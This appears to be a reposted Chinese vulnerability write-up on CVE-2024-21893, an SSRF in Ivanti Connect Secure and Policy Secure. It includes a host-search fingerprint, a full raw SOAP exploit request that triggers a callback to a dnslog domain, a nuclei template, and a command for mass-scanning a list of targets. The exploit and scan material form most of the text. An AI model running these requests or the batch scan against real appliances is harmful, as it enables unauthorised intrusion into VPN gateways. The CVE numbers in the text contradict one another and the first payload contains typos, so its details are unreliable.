01
—
漏洞名称
02
—
漏洞影响
Ivanti Connect Secure(9.x,22.x)和Ivanti Policy Secure(9.x,22.x)以及Ivanti Neurons for ZTA的SAML组件中存在服务器端请求伪造漏洞。
注意:该漏洞已被黑客武器化,用于大规模蠕虫传播、勒索挖矿,建议您立即关注并修复。
03
—
漏洞描述
2024年互联网上披露CVE-2023-46805 Ivanti Pulse Connect Secure VPN SSRF致远程代码执行漏洞,攻击者可构造恶意请求触发SSRF,结合相关功能造成远程代码执行。
参考链接
https:
/
/forums.ivanti.com/s
/article/
CVE-
2024
-
21888
-Privilege-Escalation-
for
-Ivanti-Connect-Secure-
and
-Ivanti-Policy-Secure?language=en_US
04
—
body
=
"welcome.cgi?p=logo"
05
—
漏洞复现
SSRF漏洞复现通常使用DNSlog方式,向靶场发送如下数据包,请求dnslog的url
POST
/dana-ws/saml20.ws
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection
: close
Content-Length
: 792
Accept-Encoding
: gzip
<?xml version=
"1.0"
encoding=
"UTF-8"
?><
soap:
Envelope
xmlns:
soap=
"http://schemas.xmlsoap.org/soap/envelope/"
> <
soap:
Body> <
ds:
Signature
xmlns:
ds=
"http://www.w3.org/2000/09/xmldsig#"
> <
ds:
SignedInfo> <
ds:
CanonicalizationMethod Algorithm=
"http://www.w3.org/2001/10/xml-exc-cc14n#"
/> <
ds:
SignatureMethod Algorithm=
"http://www.w3.org/2000/09/xmldsig#rsa-sha1"
/> <
/ds:SignedInfo> <<ds:SignatureValue>qwerty</ds
:SignatureValue>
<
ds:
KeyInfo
xmlns:
xsi=
"http://www.w3.org/2001/XMLSchema-instance"
xsi:
schemaLocation=
"http://www.w3.org/22000/09/xmldsig"
xmlns:
ds=
"http://www.w3.org/2000/09/xmldsig#"
> <
ds:
RetrievalMethod URI=
"http://kr9dqoau.dnslog.pw"
/><<
ds:
X509Data/> <
/ds:KeyInfo> <ds:Object></ds
:Object>
<
/ds:Signature> </soap
:Body></soap
:Envelope>
能看到访问记录
漏洞复现完成
06
—
批量扫描POC
nuclei官方昨晚发布了POC,就拿来用了。nuclei poc文件内容如下
id
: CVE-2024-21893
info:
name:
Ivanti SAML - Server Side Request Forgery (SSRF)
author:
DhiyaneshDk
severity:
high
description:
|
A server-side request forgery vulnerability
in
the SAML component of Ivanti Connect Secure (9.x, 22.x)
and
Ivanti Policy Secure (9.x, 22.x)
and
Ivanti Neurons
for
ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: "html:"welcome.cgi?p=logo""
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml2
0
.ws HTTP/
1.1
Host:
{{Hostname}}
<?xml version=
"1.0"
encoding=
"UTF-8"
?><
soap:
Envelope
xmlns:
soap=
"http://schemas.xmlsoap.org/soap/envelope/"
> <
soap:
Body> <
ds:
Signature
xmlns:
ds=
"http://www.w3.org/2000/09/xmldsig#"
> <
ds:
SignedInfo> <
ds:
CanonicalizationMethod Algorithm=
"http://www.w3.org/2001/10/xml-exc-c14n#"
/> <
ds:
SignatureMethod Algorithm=
"http://www.w3.org/2000/09/xmldsig#rsa-sha1"
/> <
/ds:SignedInfo> <ds:SignatureValue>qwerty</ds
:SignatureValue>
<
ds:
KeyInfo
xmlns:
xsi=
"http://www.w3.org/2001/XMLSchema-instance"
xsi:
schemaLocation=
"http://www.w3.org/2000/09/xmldsig"
xmlns:
ds=
"http://www.w3.org/2000/09/xmldsig#"
> <
ds:
RetrievalMethod URI=
"http://{{interactsh-url}}"
/> <
ds:
X509Data/> <
/ds:KeyInfo> <ds:Object></ds
:Object>
<
/ds:Signature> </soap
:Body></soap
:Envelope>
matchers-
condition:
and
matchers:
-
type:
word
part:
interactsh_protocol
# Confirms the DNS Interaction
words:
-
"dns"
-
type:
word
part:
body
words:
-
'/dana-na/'
-
'WriteCSS'
condition:
and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
运行POC
nuclei.exe -t mypoc/cve/CVE-
2024
-
21893
.yaml -l
data
/CVE-
2024
-
21893
.txt
07
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):CVE-2024-21893
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论